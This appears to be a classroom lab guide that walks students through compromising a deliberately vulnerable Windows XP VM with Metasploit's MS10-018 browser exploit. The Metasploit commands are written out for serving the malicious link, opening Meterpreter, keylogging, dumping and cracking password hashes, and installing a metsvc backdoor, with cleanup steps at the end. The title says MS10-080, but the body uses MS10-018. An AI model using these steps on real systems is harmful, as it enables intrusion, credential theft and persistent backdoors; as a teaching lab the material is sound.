Metasploit: MS10-080 - Create Malicious Link, Get Password, Set Backdoor

Section 0. Background Information

http://technet.microsoft.com/en-us/security/bulletin/MS10-018
- This vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.
Lab Notes
- In this lab we will do the following:
  1. Use Metasploit to create a malicious link using the MS10-018 vulnerability.
  2. We will show how to take over Damn Vulnerable WXP-SP2 once the malicious link is clicked.
Legal Disclaimer - bài lab cho mô hình lớp học

Section 1. Log into Damn Vulnerable WXP-SP2

Start Up Damn Vulnerable WXP-SP2.
- Instructions:
  1. Click on Damn Vulnerable WXP-SP2
  2. Click on Edit virtual machine Settings
- Note(FYI):
  - For those of you not part of my class, this is a Windows XP machine running SP2.
Edit Virtual Machine Settings
- Instructions:
  1. Click on Network Adapter
  2. Click on the Bridged Radio button
  3. Click on the OK Button
Play Virtual Machine
- Instructions:
  1. Click on Damn Vulnerable WXP-SP2
  2. Click on Play virtual machine
Logging into Damn Vulnerable WXP-SP2.
- Instructions:
  1. Username: administrator
  2. Password: Use the Class Password or whatever you set it.
Open a Command Prompt
- Instructions:
  1. Start --> All Programs --> Accessories --> Command Prompt
Obtain Damn Vulnerable WXP-SP2's IP Address
- Instructions:
  1. ipconfig
- Note(FYI):
  - In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
  - This is the IP Address of the Victim Machine that will be attacked by Metasploit.
  - Record your Damn Vulnerable WXP-SP2's IP Address.
- .
Set Simple Administrative Password
- Instructions:
  1. net user Administrator football

Section 2. Log into BackTrack5

Edit the BackTrack5R1 VM
- Instructions:
  1. Select BackTrack5R1 VM
  2. Click Edit virtual machine settings
Edit Virtual Machine Settings
- Instructions:
  1. Click on Network Adapter
  2. Click on the Bridged Radio button
  3. Click on the OK Button
Play the BackTrack5R1 VM
- Instructions:
  1. Click on the BackTrack5R1 VM
  2. Click on Play virtual machine
Login to BackTrack
- Instructions:
  1. Login: root
  2. Password: toor or <whatever you changed it to>.
Bring up the GNOME
- Instructions:
  1. Type startx

Section 4. Bring up a console terminal

Start up a terminal window
- Instructions:
  1. Click on the Terminal Window
Obtain the IP Address
- Instructions:
  1. ifconfig -a
- Note(FYI):
  - My IP address 192.168.1.111.
  - In your case, it will probably be different.

Section 5. Starting up the Metasploit MSF Console

Start Up the Metasploit msfconsole
- Instructions:
  1. msfconsole
- Note(FYI):
  - Metasploit takes about 5 to 20 seconds to start up.
Search for MS10-018
- Instructions:
  1. search ms10_018
  2. use exploit/windows/browser/ms10_018_ie_behaviors
Set Payload
- Instructions:
  1. set PAYLOAD windows/shell/bind_tcp
  2. show options
Set Required Variables
- Instructions:
  1. set SRVHOST 192.168.1.111
    - Replace 192.168.1.111 which your BackTrack's IP Address obtain from (Section 4, Step 2).
  2. set URIPATH ms10_018.html
    - It is not necessary to set the URIPATH. It is not necessary to use the name ms10_018_exploit.html.
  3. show options
Start Exploit Server
- Instructions:
  1. exploit
  2. Copy the Weblink (See Picture)
- Note(FYI):
  - The aurora exploit is all set up.
  - The server is started and the daemon is listening.

Section 6. Exploiting Internet Explorer 6

Start Up Internet Explorer
- Instructions:
  1. Start --> All Programs --> Internet Explorer
Test Phishing Exploit
- Instructions:
  1. Place the weblink you copied from (Section 5, Step 7) into the Address Bar.
    - E.g., http://192.168.1.111:8080/ms10_018.html

Section 7. Exploiting Internet Explorer 6

Buffer Overflow Sent
- Instructions:
  1. Press <Enter>
- Note(FYI):
  - You can see that the MS10-018 exploit was sent to Damn Vulnerable WXP-SP2.
View Sessions
- Instructions:
  1. sessions -l
    - "l" as in larry.
- Note(FYI):
  - The command "sessions" will show all the active connections between the attacker, BackTrack (192.168.1.111) and the victim, Damn Vulnerable WXP-SP2 (192.168.1.116)
Create New Meterpreter Session
- Instructions:
  1. setg LHOST 192.168.1.111
    - Allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell.
  2. sessions -u 1
    - "1" as in the number 1.
- Note(FYI):
  - The interpreter will start staging. After "Command Stager progress" reaches 100% done, hit the key once to get back to the prompt.
Interact with the Meterpreter Session
- Instructions:
  1. Press <Enter> to get a prompt
  2. sessions -l
    - "l" as in larry.
    - Notice there are now two sessions: (1) Shell and (2) Meterpreter.
  3. sessions -i 2
    - "-i" means to interact

Section 8. View Processes

View Processes
- Instructions:
  1. ps

Section 9. View Tools/Possibilities

View Tools/Possibilities
- Instructions:
  1. run<Press Spacebar><Press Tab><Press Tab>
    - <space> means hit the space bar once.
    - <tab> means hit the tab key, which needs to occur twice.
  2. y
  3. Keep Pressing the Spacebar until all the choices are listed.

Section 10. run keylogrecorder

View Tools/Possibilities
- Instructions:
  1. run keylogrecorder
- Note(FYI):
  - Notice the message that says the keystrokes are being saved to a file.
  - Record your file.
Start Up Notepad (On Damn Vulnerable WXP-SP2)
- Instructions:
  1. Start --> All Programs --> Accessories --> Notepad
Test the key logger recorder
- Instructions:
  1. In notepad, type whatever you want.
  2. Continue to next step
Test the key logger recorder (On BackTrack5R1)
- Instructions:
  1. Copy Key Log Recorder File (See Picture)
  2. Press <Ctrl> and c to stop the keylogrecorder
Start Another Terminal
- Instructions:
  1. Click on the Terminal Icon
View Key Log Recorder
- Note(FYI):
  - Replace the below highlighted file with your's obtained from (Section 10, Step 4).
- Instructions:
  1. cat /root/.msf4/logs/scripts/keylogrecorder/192.168.1.116_20130415.5300.txt

Section 11. run scraper

Run Scraper
- Note(FYI):
  - Don't be alarmed if you see an error after you see the password hashes were dumped.
- Instructions:
  1. run scraper
Start Another Terminal
- Instructions:
  1. Click on the Terminal Icon
View Hash File
- Instructions:
  1. find /root/.msf4/logs/scripts/scraper/* -print
    - This will show you a list of files that were scraped from Damn Vulnerable WXP-SP2.
  2. cat /root/.msf4/logs/scripts/scraper/*/*hash*
    - This contains all the password hashes on Damn Vulnerable WXP-SP2.
  3. grep Admin /root/.msf4/logs/scripts/scraper/*/*hash* > /var/tmp/admin_hash.txt
    - Extract the Administrator password hash
  4. ls -l /var/tmp/admin_hash.txt
Crack Password with John the Ripper
- Instructions:
  1. /pentest/passwords/john/john /var/tmp/admin_hash.txt

Section 11. Install Backdoor (metsvc)

Get Metasploit Process ID
- Instructions:
  1. getsystem
    - The "getsystem" command is used to gain system privileges.
  2. run metsvc
    - The "run metsvc" command installs a backdoor service on the Victim Machine.
  3. Record the temporary installation directory (See Picture)
    - In my case, it is kyKvcFtW
View metsvc.exe process
- Instructions:
  1. ps
    - Hunt for the metsrv.exe process to make sure it is running.
Exit From Metasploit
- Instructions:
  1. exit
    - Shutdown Meterpreter
  2. exit -y
    - Stop Server
Start Metasploit Console
- Instructions:
  1. msfconsole
Connect to Backdoor(metsvc.exe)
- Instructions:
  1. use exploit/multi/handler
  2. set PAYLOAD windows/metsvc_bind_tcp
  3. set LPORT 31337
  4. set RHOST 192.168.1.116
    - Replace 192.168.1.116 with Damn Vulnerable WXP-SP2's IP Address obtain from (Section 1, Step 6).
  5. exploit

Section 12. Upload Fake Virus

Start Another Terminal
- Instructions:
  1. Click on the Terminal Icon
Create Pretend Virus File
- Instructions:
  1. cd /var/tmp
  2. touch pretend_virus.txt
Upload Fake Virus
- Instructions:
  1. upload /var/tmp/pretend_virus.txt C:\

Section 13. Proof of Lab

Proof of Lab
- Instructions:
  1. cd ../../
  2. dir | findstr virus
  3. netstat -nao | findstr 31337
  4. date /t
  5. echo "Your Name"
    - This should be your actual name.
    - e.g., echo "John Gray"
- Proof of Lab Instructions:
  1. Do a PrtScn
  2. Past into a word document
  3. Upload to website www.antoanthongtin.edu.vn.

Section 13. Clean Up Victim Machine

Exit Metasploit (On BackTrack5R)
- Instructions:
  1. exit
  2. exit -y
Change the Administrator Password (On Damn Vulnerable WXP-SP2)
- Instructions:
  1. net user Administrator NewPassword
    - Replace the string "NewPassword" with your previous password.
End Metsvc Processes
- Instructions:
  1. tasklist | findstr "metsvc*"
  2. taskkill /F /PID 3328
    - Replace 3328 with the PID associated with metsvc.exe
  3. taskkill /F /PID 440
    - Replace 440 with the PID associated with metsrv-server.exe
  4. tasklist | findstr "metsvc*"
Delete Metsvc Backdoor
- Instructions:
  1. In Windows Explorer navigate to the following directory:
    - C:\Documents and Settings\Administrator\Local Settings\Temp in Windows Explorer
  2. Left Click on the metsvc directory name obtained from (Section 11, Step 1, Instruction 3).
  3. Click Delete
  4. Click the Yes Button to Confirm Folder Delete Message